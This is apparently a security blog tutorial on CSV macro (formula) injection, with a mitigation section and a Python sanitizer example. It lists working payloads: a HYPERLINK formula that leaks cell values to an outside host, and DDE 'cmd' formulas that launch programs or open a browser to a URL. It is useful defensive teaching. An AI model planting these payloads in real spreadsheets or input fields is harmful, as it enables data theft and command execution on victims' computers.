CSV Macro Injection

CSV Macro Injection: It’s rather a trick to abuse the functionality…

Application security is a tricky domain. Imagine that for years you treated something as a feature of your application, and it suddenly turns out to be a vulnerability that can be exploited to take down your system completely. CSV Macro Injection (Formula Injection) is one of those. We will look in detail at how such a simple and useful feature can become a vulnerability and affect the whole CIA triangle.

We can’t deny the usefulness of spreadsheets in our daily IT and non-IT life. If you have bulk data that you want to edit, sort, present or compute on repeatedly (and spreadsheets can do much more than this), Excel and CSV are the right file formats for you. In computing, a comma-separated values (CSV) file stores tabular data (numbers and text) in plain text. Each line of the file is a data record.

Each record consists of one or more fields, separated by commas. The use of the comma as a field separator is the source of the name for this file format. The CSV file format is not standardized. The basic idea of separating fields with a comma is clear, but it becomes complicated when the field data may also contain commas or even line breaks. CSV implementations may not handle such field data, or they may use quotation marks to surround the field. Quotation does not solve everything: some fields may need embedded quotation marks, so a CSV implementation may include escape characters or escape sequences.

When it is a vulnerability!

Finding this vulnerability is comparatively easy. Many web applications have a feature that lets users download or export data in .csv or .xlsx format. The spreadsheet may contain input from many sources, some of which may not be safe. At first glance this looks like a nice feature, but it can be quite risky because any cell starting with the ‘=’ character will be interpreted by the spreadsheet software as a formula. Such a formula can be turned into a tool to call any function or perform a task on the victim’s computer. For example, on an e-commerce website a user gives the following value as his address:

=HYPERLINK("https://iosec.in?leak="&C1&D1,"Error: May be here !!")

Now the vendor downloads a spreadsheet with the list of customers along with their addresses and other details. The particular cell value will look something like below.

Once the vendor admin clicks on the cell, the values of cells C1 and D1 are sent to https://iosec.in. This is especially serious when the spreadsheet contains sensitive information.

Why it happens?

This vulnerability occurs because of Dynamic Data Exchange (DDE). DDE is a protocol for inter-process communication under Windows. MS Excel, LibreOffice and Apache OpenOffice support this protocol. The DDE function has the following format:

=DDE(server; file; item; mode)

So, by using malicious arguments, it is possible to remotely execute applications or commands on the computer of whoever opens the document.

What if there is nothing sensitive in the spreadsheet?

Formulae can be written in many ways, not only to leak spreadsheet values but also to execute arbitrary actions on the victim’s computer. The nature and functionality of these payloads depend entirely on the imagination and purpose of the attacker.

The most basic payload with which I test an application is:

=cmd|' /C calc'!A0

Upon opening the Excel/CSV file, it launches the calculator on the Windows machine, but before that Microsoft shows a small warning about the trigger. However, if the user is downloading the file from his own website or from a reputable application, he will definitely click to trust it (kind of interesting).

More payloads

=cmd|'/c start netstat'!A0
=cmd|'/C start iexplore http://www.etchacked.in'!A0

The attacker can put any malware download link in the above payload.

=cmd|'/c start ping -t'!A0

Let me know if you come across any other interesting ideas for payloads.

How to fix!

The following symbols can trigger formula interpretation in Microsoft Excel:

  • Equals to (“=”)
  • Plus (“+”)
  • Minus (“-”)
  • At (“@”)

When generating spreadsheets, fields that begin with any of the above symbols should be prepended by a single quote or apostrophe (‘) character. Microsoft Excel will preserve data integrity by hiding this character when rendering the spreadsheet.

Lastly, as a security best practice, consider stripping all trailing white space where possible, and limiting all client-supplied data to alphanumeric characters.
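
One way to apply the fix above on the export side, as an added example that is not code from the original post: every cell is checked against the four trigger symbols and prefixed with an apostrophe before the CSV is written. The function names and sample rows are constructed for illustration; leaving application-generated numbers unprefixed and testing the first non-blank character are assumptions that go beyond the post's rule.

```python
import csv
import io

# Trigger characters listed in the post for Microsoft Excel.
FORMULA_TRIGGERS = ("=", "+", "-", "@")


def neutralize_cell(value):
    """Return a value that a spreadsheet will render as text, not a formula."""
    # Assumption: numbers produced by the application itself are not
    # attacker-controlled strings, so they are passed through unchanged.
    if isinstance(value, (int, float)) and not isinstance(value, bool):
        return value
    text = "" if value is None else str(value)
    text = text.rstrip()  # the post's advice: strip trailing white space
    # Assumption: test the first non-blank character, so a payload hidden
    # behind leading spaces is caught as well.
    if text.lstrip().startswith(FORMULA_TRIGGERS):
        return "'" + text
    return text


def export_csv(rows):
    """Serialize rows to CSV text with every cell neutralized."""
    buf = io.StringIO()
    # QUOTE_ALL keeps embedded commas, quotes and line breaks inside a field.
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return buf.getvalue()


# Constructed sample export: header, one benign row, two hostile rows.
SAMPLE_ROWS = [
    ["name", "address", "balance"],
    ["Asha", "12 Lake Road  ", -40],
    ["Mallory", '=HYPERLINK("https://iosec.in?leak="&C1&D1,"Error")', 15],
    ["Eve", "  @SUM(1+1)", 0],
]

if __name__ == "__main__":
    print(export_csv(SAMPLE_ROWS), end="")
```

Apply the neutralization at the point where the file is generated, not where the data is stored, so the stored address stays unmodified for other consumers.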

Disclaimer: This post is for learning purposes only; use it only with the permission of the admin of the application.